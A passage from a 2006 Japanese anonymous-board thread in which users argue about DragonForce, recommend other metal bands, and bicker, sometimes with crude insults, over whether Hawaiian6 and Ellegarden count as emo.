こういうやつは飽きるまで好きなものをとことん追求しないと世界が広がらん

183 :名無しさんのみボーナストラック収録:2006/05/04(木) 05:41:45 ID:dDhvYy9IO
いや、こいつをメロスピ厨扱いするのはメロスピ厨に失礼というものだろう。
メロスピを極めてすらいないのだから。


184 :名無しさんのみボーナストラック収録:2006/05/04(木) 05:54:32 ID:kxz2yZvl0
これを聴いていたらラプソディーが本当にメロスピなのか疑問に思えてきた

185 :名無しさんのみボーナストラック収録:2006/05/04(木) 06:32:02 ID:VzJKi8mB0
そもそもメロスピてなんだお?(・ω・) 
と新スレ予感の疑問を投げかけてミール

186 :名無しさんのみボーナストラック収録:2006/05/04(木) 08:12:45 ID:TtZCvcVSO
メロスパーな俺でも、ドラフォは、いまいちなんだがな。

ちなみにメロスピってのは、キーパーパンプキンのパクリ音楽。

187 :名無しさんのみボーナストラック収録:2006/05/04(木) 10:21:22 ID:lc23TQ980
ドラフォ並みに速いっていったら
もうブラックメタルやデスメタルしかないんじゃない?

188 :名無しさんのみボーナストラック収録:2006/05/04(木) 13:09:13 ID:SmmMaZ0P0
おい!>>1コラ!!
面接どうだったんだよ!!
とりあえずイングヴェイマルムスティーンは死ってんだろうな??

189 ::2006/05/04(木) 18:05:40 ID:QR9wBKJR0
おっす

2時間睡眠で面接いってきた!!


いや俺はドラフォを聞いて感動した!

もしかしたらもっといい音楽に出会えるんじゃないかと思い

おまいらに聞いてみたんだよ

190 ::2006/05/04(木) 18:19:36 ID:QR9wBKJR0
関係ないがHAWAIIAN6ってどう思う?

191 :名無しさんのみボーナストラック収録:2006/05/04(木) 18:26:25 ID:VzJKi8mB0
>>1
面接乙!

HAWAIIAN6 ←知らない うp汁

>>186 何が好き?

192 :名無しさんのみボーナストラック収録:2006/05/04(木) 18:53:09 ID:NJCkqeUr0
ドラフォはメタルじゃないからメタルやってるバンドでドラフォを超えるバンドを探すのは無理だよ。

193 ::2006/05/04(木) 19:12:52 ID:QR9wBKJR0
ttp://blog.music-gid.com/archives/30251606.html

こーいうの

194 ::2006/05/04(木) 19:15:06 ID:QR9wBKJR0
ttp://audio.search.yahoo.co.jp/bin/query?ei=UTF-8&p=hawaiian6&fr=top_v2&tid=top_v2&search_x=1

どうよ?

195 :名無しさんのみボーナストラック収録:2006/05/04(木) 20:55:29 ID:ifWyS45uO
速さならシステムオブアダウンかマキシマムザホルモン聴いてみれば?

196 :名無しさんのみボーナストラック収録:2006/05/04(木) 21:04:39 ID:ifWyS45uO
ハワイアンは暗いけどおれは好きですよ

197 :名無しさんのみボーナストラック収録:2006/05/04(木) 21:09:02 ID:7JdTytZq0
>>195はメタル初心者。

198 ::2006/05/04(木) 21:10:23 ID:QR9wBKJR0
ただ早いのはcryptopsyとかnile、エンペラーで十分

ドラフォの疾走感はまじやばす

199 :名無しさんのみボーナストラック収録:2006/05/04(木) 21:11:51 ID:TtZCvcVSO
>>191
1stのシドニアとか2ndのラビリンス。
アヴァンタジアとかロスホラ、ヒブリアにサヴェージサーカス…。挙げだしたらキリがない。
ここ最近は、マニガンスかな。

200 :名無しさんのみボーナストラック収録:2006/05/04(木) 21:31:25 ID:Y8PfdTFk0
Dragonforceってアレだっけ?

201 :名無しさんのみボーナストラック収録:2006/05/04(木) 22:00:33 ID:ifWyS45uO
>>>197
正解。ただ語感が似てるから言ってみたかったんだ

202 :名無しさんのみボーナストラック収録:2006/05/04(木) 22:52:43 ID:eCC0CybC0
結局何言っても1は
速いだけ、疾走感がない
とか言うんじゃないの?

203 :名無しさんのみボーナストラック収録:2006/05/04(木) 23:02:09 ID:FyIDEmSC0
>>202
あと、メロディーが台無し、ね

ドラフォを悪く言う気は無いが、メイデンでメロディーが台無しなら
>>1に正統派は無理。ビジュアル系に戻れ

204 ::2006/05/04(木) 23:45:39 ID:sehn0+6v0
はっはっはっ

205 :名無しさんのみボーナストラック収録:2006/05/04(木) 23:48:56 ID:bkHh2tgbO
ヒブリアやばいよ。うん。

206 :狛江市 ◆GnU5CtzE32 :2006/05/04(木) 23:53:53 ID:WdtBfVWX0
そんなに叩かれるようなバンドではないと思うがな(・∀・)
無駄に長いのと、似たようなギターソロが台無しにしてるだけで
もう少しコンパクトにまとめれば、楽曲の差別化もされるし
ピロピロギターソロも気にならなくなると思われ(・∀・)

207 :名無しさんのみボーナストラック収録:2006/05/05(金) 00:14:25 ID:xWY/+Ces0
叩かれてるのはドラフォではなくここの>>1

208 :名無しさんのみボーナストラック収録:2006/05/05(金) 00:19:51 ID:4kTBMMHLO
ドラゴン久保(*´Д`*)ハァハァ

209 :メ〜〜〜〜〜トゴ〜〜〜〜〜:2006/05/05(金) 01:10:55 ID:bzK8XinmO

ドラゴンフォースが、いずれB!の人気投票で首位を獲れるか、どうかは6月のライブにかかってる鴨

もっと熟れて、売れてほしい

210 :名無しさんのみボーナストラック収録:2006/05/05(金) 01:14:44 ID:pMtqZkoS0
>>1
だからサンダースティール聞けって

211 :名無しさんのみボーナストラック収録:2006/05/05(金) 01:25:37 ID:kdNGRv3B0
>>1
> ドラフォ超えるバンドねーの?

あるわけないだろw

212 :名無しさんのみボーナストラック収録:2006/05/05(金) 02:00:39 ID:E1ILA4nr0
あーくえねみー

213 :名無しさんのみボーナストラック収録:2006/05/05(金) 02:51:00 ID:C9Ebfc0Z0
The Rolling Stones

214 :名無しさんのみボーナストラック収録:2006/05/05(金) 06:01:33 ID:Wg8ak6/wO
チルボド
ウィンターサン

オムニウムギャザラム
モルプリ

インペイルドナザレーン
ディムボガー

ナグルファー
1349

なんかはいかが?

215 :名無しさんのみボーナストラック収録:2006/05/05(金) 08:29:33 ID:a9ix+gTP0
また神の音楽メロスピに嫉妬してる厨房どもが暴れてるようだな

216 ::2006/05/05(金) 15:54:56 ID:vm4FUj3G0
ねてた

217 :名無しさんのみボーナストラック収録:2006/05/05(金) 15:59:01 ID:VRocevjWO
聴いてて疲れます

218 :名無しさんのみボーナストラック収録:2006/05/05(金) 17:26:24 ID:9Ll1nAJc0
なんだよもっと>>1頑張れよ〜
こういうスレはお前がちゃんとしないと伸びないんだぞ

もっと、メロスピ房ですら引く狂儲意見を聞かせてくれよ

219 ::2006/05/05(金) 17:37:02 ID:vm4FUj3G0
うーん

じゃあ俺の求めるものとして

ドラム、ギターが激しいもの
シャウト主体の音楽はだめ
ボーカルがハイボイス
テンションがあがるもの
メンバーがしっかりしてるもの

220 :名無しさんのみボーナストラック収録:2006/05/05(金) 18:15:23 ID:xWY/+Ces0
>>219
だったら>>82-83でいいだろ

221 ::2006/05/05(金) 18:19:44 ID:vm4FUj3G0
nevermoreはなんかテンションがあがらない

ぬるい感じ

222 :名無しさんのみボーナストラック収録:2006/05/05(金) 18:30:44 ID:xWY/+Ces0
>>221
そのテンションってのが一番微妙だな…。
デスやスラッシュ聴いてテンションあがる奴もいれば
そうじゃない奴もいる。これは技術や歌唱力は関係なく
完全に個人の感性の問題だからなぁ…。

223 ::2006/05/05(金) 18:35:56 ID:vm4FUj3G0
>>222

たしかに。。

ただドラフォ聞いて感動した俺にとってメタルの世界にはもっと
眠った音楽があるのではないかと思い聞いてみた

224 :名無しさんのみボーナストラック収録:2006/05/05(金) 20:18:31 ID:Wg8ak6/wO
ウィンターサン聴いて疲れるぐらいなら1はずっとどらほ聴いてろよ。それがいいよ。

225 :名無しさんのみボーナストラック収録:2006/05/05(金) 20:53:26 ID:aJMYtoH40
要するにドラフォに感銘を受けて今はドラフォ以外受け付けない状態になってるんでしょ。
何言っても無駄じゃん。

226 :名無しさんのみボーナストラック収録:2006/05/05(金) 20:55:30 ID:HBc/3np90
>>1はドラフォに一生ついていくしかないな。

俺はSlayerが好きだが、まあ>>1には合わないだろうな。諦めろ。

227 :狛江市 ◆GnU5CtzE32 :2006/05/06(土) 01:26:43 ID:s7DCqOAJ0
>>1
buning in hellとかどうかしら?(・∀・)

228 :名無しさんのみボーナストラック収録:2006/05/06(土) 01:31:37 ID:W2Ix8D320
バニヘルは速いだけで曲がつまらんよ

229 :狛江市 ◆GnU5CtzE32 :2006/05/06(土) 01:51:42 ID:s7DCqOAJ0
>>228
それはドラフォにもあてはまるんじゃ…(・∀・;;

230 :名無しさんのみボーナストラック収録:2006/05/06(土) 01:51:46 ID:Fjiu5jU+0
実家に帰ってますた(‐‐;)
なぜかカキコできなっかったんで、イラついてましたヨw

ハワイアン6聴いてみた。悪くないと思う、フツーに。嫌いではない。
↑を聴いて思ったが、>>1はいわゆる一般的なメタラーとは違う気がする。
どちらかと言えば、フツーはこういう音楽は排除したがるほうだと思うし。
だから…自分の耳で探しまくるしかないいのでは?
人に薦められて聴き始めるようなタイプではないと思う。

メタルの中でもやっぱりジャンルがあるわけだからさ。
ドラフォはメロスピの枠だけで「ドラフォ超えるバンドねーの?」だったら、
このスレのレスを読む限り、無さそうな感じがするし。
(俺は安置ドラフォだが)

俺はウィンターサンとか好きだからさ。>>1は知らないでしょ?たぶん。
ほんとに“メタル”に興味があるなら、B!とかその他の雑誌を読んで
勉強したら?それくらいやってもいい。

スマソw熱く語り過ぎますたww



231 ::2006/05/06(土) 03:34:21 ID:NH+Kj87A0
>>230

なるほどね

ほんとにいい音楽は借金してでも聴きたいわ

232 :名無しさんのみdisk+:2006/05/06(土) 03:49:52 ID:RMCrJ0McO
ドラフォは速いだけで同じように聞こえちまうなぁ。Guitarはエフェクターに頼り過ぎてる気もするし。スピードを求めてるなら良いかもしれないが。カコイイ曲もあるけどね(゚∀゚)
DEATHでも聴いてみれば?バンド名のとおりデスメだけど…

余談だけどHawaian6はエモパンだからメタルには入らないべ!洋楽メインの雑誌にも取り上げられてるけどさ。ジャンル的にはエルレとかと同じだよ。

233 :名無しさんのみボーナストラック収録:2006/05/06(土) 03:51:16 ID:6ag/X0Vm0
エルレとは違うべーwww

234 ::2006/05/06(土) 03:52:14 ID:NH+Kj87A0
いやハワイアンはパンクだよ。

てか友達が聞いてたからさ

俺は聞かないけどwwww



235 :名無しさんのみdisk+:2006/05/06(土) 03:57:26 ID:RMCrJ0McO
エルレもエモだしHawaianもエモだしジャンルは同じになるよ。この2つのバンドで比べると歌声が極端だから違う風に聞こえるだけさ。

236 :名無しさんのみボーナストラック収録:2006/05/06(土) 04:02:26 ID:6ag/X0Vm0
hawaiian6はエモじゃないよ、別に。
エモ知ってる?

237 :名無しさんのみdisk+:2006/05/06(土) 04:07:32 ID:RMCrJ0McO
いやいやHawaianはどう聴いてもエモだべ?エルレの方がエモか疑いたくなんね?

エモーショナル=感情的にだべや

そっちこそHawaian6聴いて言ってんの?

238 :名無しさんのみボーナストラック収録:2006/05/06(土) 04:08:45 ID:6ag/X0Vm0
エモはエモーショナルの略じゃねえよwww
音楽のジャンルだよ。
エルレもエモじゃねえし。
無知は死ねよwww

239 :名無しさんのみボーナストラック収録:2006/05/06(土) 04:09:27 ID:6ag/X0Vm0
fugaziとmineralを百回聴いてからエモ語れよ、どあほwww

240 :名無しさんのみボーナストラック収録:2006/05/06(土) 04:10:16 ID:6ag/X0Vm0
エモつうのは、パンクやハードコアから、ロックにアプローチしていく途中で生まれた
音楽で、ポストハードコアと呼んでもいいジャンルだ。

241 :名無しさんのみボーナストラック収録:2006/05/06(土) 04:11:10 ID:6ag/X0Vm0
エモパンクはget up kidsや初期promise ring、saves the day、motion city soundtrack等だよ!

242 :名無しさんのみボーナストラック収録:2006/05/06(土) 04:12:06 ID:AYdqsaDT0
エモ、スクリーモ、カオティック、ニュースクールの違いを教えてくれ

243 :名無しさんのみボーナストラック収録:2006/05/06(土) 04:13:29 ID:6ag/X0Vm0
>>242
エモ→スクリームして無い。
スクリーモ→スクリームしてる
カオティック→めちゃくちゃでぴろぴろぎゅわんぎゅわん言ってる
ニュースクール→昔ながらのハードコアとスレイヤーの影響が強めで
            ミドルテンポ主体のメタリックなハードコア。

244 :名無しさんのみボーナストラック収録:2006/05/06(土) 04:15:08 ID:6ag/X0Vm0
http://www.myspace.com/mineral
エモ。

245 :名無しさんのみdisk+:2006/05/06(土) 04:28:57 ID:RMCrJ0McO
わかんねぇ奴だな。エルレもHawaianもエモパンだ!
これらの曲聴いてHCに聞こえんのかよ?学んだばかりの言葉並べてバカの1つ覚えみたく言ってんじゃねぇよ(;´Д`)
まずは曲聴いて該当するか考えろよ!

246 :名無しさんのみボーナストラック収録:2006/05/06(土) 04:30:33 ID:6ag/X0Vm0
馬鹿じゃねえの、コイツwww

エモじゃねえっつってんだろ。馬鹿。
エモはエモーショナルの略じゃねえんだよ。
無知は死ねってのwww

hawaiian6はエモーショナルで切ないメロディックパンクだろ。
エモじゃねえの。わかった?

247 :名無しさんのみボーナストラック収録:2006/05/06(土) 04:33:19 ID:KOG9uqn70
ジャンル分け無意味す

248 :名無しさんのみボーナストラック収録:2006/05/06(土) 04:35:40 ID:6ag/X0Vm0
そうだな、エルレガーデンとhawaiian6はデスメタルでいいな。

249 :名無しさんのみdisk+:2006/05/06(土) 04:39:01 ID:RMCrJ0McO
何回言えばわかんのよ?
メロディックなパンクなら、メロディがハッキリしてればどのパンクバンドにもあてはまるんだ!
オマエの概念でジャンル決められたら終わりだ。

250 :名無しさんのみボーナストラック収録:2006/05/06(土) 04:39:57 ID:6ag/X0Vm0
アホが。死ねよ。
エモはジャンルの名前なの。
わかってる?
エモーショナルならエモってわけじゃないの。
日本語勉強しろよクズ。

251 :名無しさんのみボーナストラック収録:2006/05/06(土) 04:41:48 ID:6ag/X0Vm0
エルレもハワイアン6もメタルでいいよ。
いいだろ?
な。
おまえは文句ねえよな!
おまえの概念でジャンル作るなよなwww

252 :名無しさんのみボーナストラック収録:2006/05/06(土) 04:43:01 ID:Fjiu5jU+0
>>247
極論キタw

>>248>>250
ワロスwwここはマジメにいってみようぜw

>>247
メタルもロックの一部ってことでおk?

253 :名無しさんのみボーナストラック収録:2006/05/06(土) 04:45:07 ID:6ag/X0Vm0
エモ聴けよ。
http://www.purevolume.com/daphnelovesderby
http://www.purevolume.com/mae
http://www.purevolume.com/motioncitysoundtrack
http://www.purevolume.com/copeland
http://www.purevolume.com/wakingashland

254 :名無しさんのみボーナストラック収録:2006/05/06(土) 04:48:26 ID:6ag/X0Vm0
馬鹿のチンカスに絡まれて不機嫌じゃ。
daphne loves derbyでも聴いて癒されよう。

255 :名無しさんのみボーナストラック収録:2006/05/06(土) 04:48:46 ID:uTeV8xas0
この手の揉め方見ていつも思うけど、最近のジャンル分けって無駄に細分化させ過ぎだよな。
余りにもジャンルが増え過ぎで個人個人の認識がバラバラになり過ぎてて
ジャンル分けの本来の利便性が完全に失われている。

256 :名無しさんのみボーナストラック収録:2006/05/06(土) 04:49:46 ID:6ag/X0Vm0
>>255
無知が悪いだけだよ。

257 :名無しさんのみボーナストラック収録:2006/05/06(土) 04:56:56 ID:NHl2BJSg0
とにかく片っ端からいろんなバンドのサンプルとかを聞いてみれば?
そもそも自分の好きな音楽は自分で見つけるもんだろ?
それがメタルの楽しみじゃないのか?>>1


258 :名無しさんのみボーナストラック収録:2006/05/06(土) 05:03:17 ID:uTeV8xas0
>>256
今回の事はどちらが正しいとかは置いておくとしても、
アンタだって今後引用元が絶対に間違えないって言い切れないでしょ。
特に新しいジャンル程、各雑誌やサイト毎に微妙に認識が違っていたりする事も珍しくないし。
そうなるとその人物が何処を参考にしたかで余計に混乱していく事になる。

259 :名無しさんのみボーナストラック収録:2006/05/06(土) 06:40:13 ID:vW0K4mTd0
6ag/X0Vm0の肩を持つわけじゃないが、ジャンルとして使われてる「エモ」の
内容を説明したかっただけなんだと思うが。言葉は汚いが。
上に挙がってるバンドがエモか否かの問題は置いといても、RMCrJ0McOは
一般に言われるところの「エモ」ロックを勘違いしてると思う。

260 ::2006/05/06(土) 14:28:15 ID:u9xQBjnZ0
おい

メタルかたれやw

261 :名無しさんのみボーナストラック収録:2006/05/06(土) 16:17:12 ID:Ti7qmJ1a0
メタル語れと言われましても・・・
1が興味を示さないので・・・

262 :ゴールデンウイーク糞スレ祭り(・∀・):2006/05/06(土) 17:05:32 ID:5/AqtP3i0
ゴールデンウイーク糞スレ祭り(・∀・)

263 :名無しさんのみボーナストラック収録:2006/05/06(土) 17:40:41 ID:Zcj16jrF0
メタル語るしす!!
とりあえずメタリカの新ベーシストがなぜ
あんなにマッチョなのかについて。

え? 糸冬 了 ??

264 :名無しさんのみボーナストラック収録:2006/05/06(土) 20:43:54 ID:cVtR4kDd0
すげえ、よくこんなチキンにお前らここまで付き合ってやれたなw
もうそろそろ放置してやろうぜ

265 ::2006/05/06(土) 23:28:48 ID:Qua3l0Rz0
いいバンドよろ


266 :名無しさんのみボーナストラック収録:2006/05/06(土) 23:32:03 ID:L4N5YmydO
VisionDivineの3rd

267 :名無しさんのみボーナストラック収録:2006/05/07(日) 18:11:53 ID:06EcBQDrO
おまいら ラ・ム―を聴いてから来いよ

268 :名無しさんのみボーナストラック収録:2006/05/07(日) 18:36:52 ID:FabvR2pg0

            ラ・ムー
http://music4.2ch.net/test/read.cgi/hrhm/1140350162/


269 :名無しさんのみボーナストラック収録:2006/05/08(月) 02:48:27 ID:YiDSdcLL0
>>1
ダルい曲揃いの黒盤でメタリカを判断すんな。
メタルマスターとライドザライトニングを聴け。

270 :名無しさんのみボーナストラック収録:2006/05/10(水) 03:31:02 ID:V0/JA7sg0
おめーら調子こくな
クリントンランページジャクソン聞け

271 :名無しさんのみボーナストラック収録:2006/05/11(木) 18:17:07 ID:wxB9mVIeO
NINJA MAGIC欲しいけどアマゾンにもない…
買った人どこで買った?

272 :名無しさんのみボーナストラック収録:2006/05/11(木) 18:41:22 ID:rJgBdqA60
高音が出れば歌がうまいと思ってるやつはアホ

273 :名無しさんのみボーナストラック収録:2006/05/11(木) 19:00:59 ID:NdN8m4Jh0

>>272

てめーがアホ
おめーら調子こくな
クリントンランページジャクソン聞け




274 :名無しさんのみボーナストラック収録:2006/05/11(木) 19:58:22 ID:35VcFcXF0
ドラフォw
一発ギャグみたいなもんだよアレ。マジで。
最初は吹いたけど二回目からは痛くて聴けなかった。

275 :名無しさんのみボーナストラック収録:2006/05/12(金) 23:51:24 ID:YFjZzjWw0
ドラフォ以上のバンドなんてないだろwww


276 :名無しさんのみボーナストラック収録:2006/05/13(土) 02:57:46 ID:EkG1Htmy0
メロスパーだけどドラフォの良さとかおもしろさが理解できない

277 :名無しさんのみボーナストラック収録:2006/05/13(土) 03:31:40 ID:pcdJvBRH0
>>276
同意

その速さがゆえに、犠牲になってるものが多すぎる。

>>275
さすがに歌メロがワンパターンなのは同意してくれるよな。

278 :名無しさんのみボーナストラック収録:2006/05/13(土) 16:24:39 ID:MD4BL5WZ0
てめーがアホ
おめーら調子こくな
クリントンランページジャクソン聞け


279 :名無しさんのみボーナストラック収録:2006/05/13(土) 16:28:56 ID:U3STR/dy0
MAVERICKは最強の新人

280 :名無しさんのみボーナストラック収録:2006/05/13(土) 17:06:22 ID:se4ytElF0
HEAVENLYやNEMESISやPOWER QUESTやDRAGONLANDなどを
全て聴いてからドラフォが一番とか言ってる?
ドラフォマニアの皆さんよ!





281 ::2006/05/13(土) 17:11:18 ID:MD4BL5WZ0
>>280
上のは全部聞いたけどHEAVENLYやNEMESISやPOWER QUESTやDRAGONLANDなら余裕でドラフォ

282 :名無しさんのみボーナストラック収録:2006/05/13(土) 17:44:55 ID:se4ytElF0
ドリーム・シアター

283 :名無しさんのみボーナストラック収録:2006/05/13(土) 17:46:18 ID:zw5+Bykw0
バルサゴスは?ドラフォを激しくしただけかもだけど

284 :名無しさんのみボーナストラック収録:2006/05/13(土) 17:49:37 ID:PRX7UJjH0
>>281
同意



285 :名無しさんのみボーナストラック収録:2006/05/13(土) 17:56:17 ID:PRX7UJjH0
>>282
板違いだ

今NINJA MAGIC聴いたが俺には合わなかった
CELLADORってのはhttp://www.youtube.com/watch?v=p7_JafYlMY8&search=DragonForceより凄いのか?

286 :名無しさんのみボーナストラック収録:2006/05/13(土) 18:01:30 ID:B8javuK/O
ラプソやエドガイやジューダス

287 :名無しさんのみボーナストラック収録:2006/05/13(土) 20:55:00 ID:se4ytElF0
ここでドラフォのプロモが見れる
THROUGH THE FIRE AND FLAMESのプロモだ!

http://www.youtube.com/watch?v=l3VUBIdBaOU&search=cryptopsy

よかったら見てみ!

288 :名無しさんのみボーナストラック収録:2006/05/13(土) 20:58:05 ID:RWJHeYrP0
VOがクソ
それ以外は結構いい

289 ::2006/05/13(土) 20:59:27 ID:jycZwoBH0
あほ

ドラフォがいいのはボーカルのおかげだ

290 :名無しさんのみボーナストラック収録:2006/05/13(土) 23:38:16 ID:slU0L5d60
ドラフォのボーカルのどこがいいのかよくわからんのだが
同じメロスピだとファビオのが全然いいし

291 :名無しさんのみボーナストラック収録:2006/05/14(日) 01:03:26 ID:m6m7D1dz0
フォビアのボーカルのどこがいいのかよくわからんのだが
同じメロスピだとドラフォのが全然いいし

292 :名無しさんのみボーナストラック収録:2006/05/14(日) 14:05:07 ID:OosC7VTY0
フォビア?

293 :名無しさんのみボーナストラック収録:2006/05/14(日) 17:37:02 ID:12ArgAro0
恐怖症の事だろ。恐怖症のボーカルってのの意味は判んねえけど。

294 :名無しさんのみボーナストラック収録:2006/05/14(日) 21:17:21 ID:zXaA5GmQO
メロスピでくくるんならダニエルとかルッピのが凄いよ

295 :玉田:2006/05/16(火) 19:11:07 ID:KalYY7jX0
俺の決定力を超えるFWいねーの?

296 :名無しさんのみボーナストラック収録:2006/05/16(火) 20:47:34 ID:YYI/DpHEO
俺もひょんなことでドラフォ知ってメタルの虜になったんだが他のメロスピを聴きたくなった
ドラフォ並のリズムの曲(アーティストは問わない)があったら是非教えて欲しい

297 :名無しさんのみボーナストラック収録:2006/05/16(火) 22:13:26 ID:mFFQ0HRZO
>>296
LOST HORIZONなんかは?
公式で試聴してみたら

298 :名無しさんのみボーナストラック収録:2006/05/16(火) 23:22:16 ID:0NCdb6vF0
ドラフォ並みのリズムは
メロスピよりデスやブラックのほうが多いと思う

299 ::2006/05/16(火) 23:32:22 ID:4GFuabhO0
>>297

ストラトバリウスよりかはいいがなんかパッとせん

300 :名無しさんのみボーナストラック収録:2006/05/16(火) 23:36:46 ID:scsXZwBA0
ドラフォと同じくらい好きなのは、、、ヒブリア!!!

ブラジル出身のHIBRIAしかいない。

301 :名無しさんのみボーナストラック収録:2006/05/16(火) 23:48:06 ID:kyZxBHHo0
ぶっちゃけ速度だけならドラフォがメロスピでは最速じゃないの?
予言してやるけどそんなもんは絶対に飽きが来るよ。それも結構早くにね。

302 :名無しさんのみボーナストラック収録:2006/05/17(水) 01:20:39 ID:ydh5SJeBO
遅刻しそうなときドラフォを聴きながら自転車漕ぐとなぜか間に合う

303 :名無しさんのみボーナストラック収録:2006/05/17(水) 01:32:41 ID:ZA5z4jwk0
メロスピの中で唯一ブルデスやブラックに匹敵する速さメロスピの
中では最速でメロディもクサメロだからこそ注目されてるんでしょ?
じゃなかったら誰も注目しないよこの程度のバンドは…

304 :名無しさんのみボーナストラック収録:2006/05/17(水) 01:34:43 ID:4S+BAHDD0
何か言ってる事が矛盾してるような気がする。

305 :名無しさんのみボーナストラック収録:2006/05/17(水) 01:38:26 ID:ZA5z4jwk0
つまりドラムのテクとメロスパーに喜ばれるクサメロだけが取り柄のバンドってこと
このバンドからそれ抜いたら後は何も残らない。

306 :名無しさんのみボーナストラック収録:2006/05/17(水) 01:40:05 ID:4S+BAHDD0
二つも売りがありゃ十分だと思うんだが。

307 :名無しさんのみボーナストラック収録:2006/05/17(水) 01:46:39 ID:OLbpJeV80
同じようにブラックブルデススラッシュから激しさと速さ抜いたら何も残らないけど

308 ::2006/05/17(水) 21:26:18 ID:GubR3H410
ようするにおまいらはTOKIOみたいなバンド好きなんだろ?

走れ、走れ、自分のために


でもきいてろよ

309 :名無しさんのみボーナストラック収録:2006/05/18(木) 15:16:06 ID:smTxsymM0
おれは

走れ! 走れ! 走れ!
急げ! 急げ! 急げ!
す〜す〜めぇ〜!

を聞く。

310 :名無しさんのみボーナストラック収録:2006/05/18(木) 18:49:19 ID:wbq3m1gY0
ダイの大冒険か、ドラゴンつながりだな

311 :名無しさんのみボーナストラック収録:2006/05/19(金) 00:11:01 ID:DOTFlDFHO
ドラフォはさすがに越えないけど、一時期メタル板でネタにされたKALEDONというバンドは結構すごい。
みんなキモいVOに気をとられがちだが相当速くてクサい曲もあるよ。

312 ::2006/05/19(金) 00:19:38 ID:HMlE3T490
てかダイの大冒険のバラン10巻くらいのとき弱くね?

正直矛盾しすぎ

ラーハルト強すぎ

313 :名無しさんのみボーナストラック収録:2006/05/19(金) 00:40:43 ID:RRvkgSL60
                       , .-‐======- .、
                   /,. -;ィイ/⌒^^~~"''ー 、.\、
               r‐←/i/ レ'  ̄r‐- 、' , ' , ' , `ヽ.\
                 /ー'´/ .レ´  _`‐- ´`'‐、 ' , ' , ゙li ヽ
              ,r/"⌒! レ'  /´ ̄`''‐ 、 i´゙ヽ' , ' ll  i、
            y'- 、' , ヾ=ー''", ', ', ' '   ヽ ヽ、_)   !!  .l
        _ , rr‐(    \' ' ' ' '  ,. ‐'   ヽ ' , ゙!!  !   !! /⌒'/`y'⌒ト、
、/\ __("i´ l  l !`'‐、  ヽ .r ''"   |i   ノ ' , !!  !  !! ! レ' /  ノ─
"´ ̄    ゝ-┴r´ ヽ、.._`o、{ { _,,.-=キ‐´ __ ||  | .〃 ,i -─-'、イ
       ト 、. __!     .r'"´ ̄``ヾー-=イf''´ ̄ r'´, - 、〃 ト、 _,,.ノ!
       ,r` ‐--i r'"´ ̄ ̄`ヾ     ^ヽ.  {. {   ) /'` ー--‐'1
       /   ,r'" ̄~`'‐ 、      Nヽ_,,..===:ヽ、._ー ン /       .{
      i   { ヽ、{  ノ }ヘ_,.. '-‐ !-┘      ),∨ ./       l
     i   (ゝー---一'´`´            ノ〃 ./        l
.     i r─‐ !、._,,,..___ ,.ノ       _ ,. ‐'´,〃./ ,r──‐ 、.  l
`''‐ 、.._l l      ヽ`''‐ 、          _ /´/ /      l   !_,,. -‐'
     ! !     ヽ \ 「!''ー-====-fr´ ̄ / /         l.  {
.    | |        ヽ、 l.L三三三二ニ!i. ‐''´,. ‐'´          |   !
ヽ、._,! |           ! ┌‐-----─┐  i´               |  ヽ、.__,.

314 :名無しさんのみボーナストラック収録:2006/05/19(金) 00:43:01 ID:RRvkgSL60
                  /\
                  /  \
                  /    \
                   ,'         \
                  ,' ::::       ヽ
                i :::: :::::     ヽ
                   i ::  :::::        l
                 i      :: /ヽ   |
               i      / lll lllヽ   !       / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
 __,,,.. --── 、--─‐.l.    ,.ヘ /:  C) ヽr-!-─ '7  ̄| 
          ヽ   .l l  / ,.へ、`‐、.__,.‐',. ィ|  /   .|
  `‐、           i  i | / /:::..  `''.:‐-:.'  .:|.| /   < ・・・・・・・・・・・・・・・
 \. \_,,,. --──lー|  |. \`''‐::、:::::::::::::::::://|/ー─--|
   \⌒\     |. |  |   `iヽ、 ̄i:::::::「 r‐i |     ./ |  
    `‐、 ヽ.     !|   |.   |__〈  |::::::| 〉_| ト、  //\________
   ̄ ̄ `''‐、ヽ__|    |    l lヽ.|::::::|./ l  | i ∠..二 ̄ , ‐'´
    `''‐、 / ニ ,> ヽ.   |    |/::::゙!::::::レ!  |  |/ < = \,. -─
       ヾヽ、 = ゝ/8     |:::::::::::::::::|    ヽ ノ ニ /
   ` '‐- 、 |U ̄l ̄U ((::)     l:::::::::::::::::|  | ((::)| ̄l ̄n|
   .._  `|∩! ln| |n|  O  |  l:::::::::::::::::| |  O.|∩U| ||||_,,.. -‐
      .l ̄`|| |∪||U| ||  ((::) |.  |:::::::::::::::::i | ((::)|| |∩Uu.! |
     |  .|| |∩||∩| | |   O|   |:::    :::|  O .|U.| |n∩l. |
    ヽ.|   |∪|.|.||.U| || |   ((::) !      | ((::)  |lnU.||| | |

315 :名無しさんのみボーナストラック収録:2006/05/19(金) 01:42:19 ID:zzPOcR2HO
ドラフォ超えるバンド知らねーの?

316 ::2006/05/19(金) 02:21:30 ID:TyvWZESZ0
しらねーな

317 :名無しさんのみdisk+:2006/05/19(金) 03:39:38 ID:EsZJvV1YO
ドラフォって速いだけだから飽きやすいよな。途中から同じ曲かと思うぞ

318 :名無しさんのみボーナストラック収録:2006/05/19(金) 10:15:54 ID:9Hr7bDrVO
3rdの4曲目と6曲目の最初ら返はキー変えてるだけ

319 :名無しさんのみボーナストラック収録:2006/05/23(火) 22:06:49 ID:HsOk7Uqm0
TOKIO
ゆず
サスケ
HY

ドラフォをらくらく超えてるよ

320 :名無しさんのみボーナストラック収録:2006/05/23(火) 22:09:19 ID:52bYLBg90
どう考えてもサスケは超えてないだろ。ドラフォよりテク不足。

321 :名無しさんのみボーナストラック収録:2006/05/24(水) 15:32:06 ID:jduz11Sc0
ドラフォってそんなにいいん?なんか王道メロスピをテンポ30くらい上げただけやん。
しかもライブで歌超へたいし。ナイルとかクリプトの方が4倍くらいいいわ。

322 :名無しさんのみボーナストラック収録:2006/05/24(水) 15:52:27 ID:0v5R5NotO
草屡補ドア屡は

323 :名無しさんのみボーナストラック収録:2006/05/24(水) 20:01:21 ID:0zZKI/om0
このスレ……ループしてね?

324 :名無しさんのみボーナストラック収録:2006/05/24(水) 23:30:13 ID:7wJbm9cv0
ダブルドラゴンのBGM

325 :名無しさんのみボーナストラック収録:2006/05/24(水) 23:35:35 ID:UDsryLFi0
ドラクエ?
ドラフォって食べられるの?

326 :名無しさんのみボーナストラック収録:2006/05/24(水) 23:44:41 ID:Z80P2lVDO
>>319
おい、オレンジレンジ忘れてるぞ

327 :名無しさんのみボーナストラック収録:2006/05/24(水) 23:55:12 ID:d82KOaWyO
速いだけじゃ飽きる

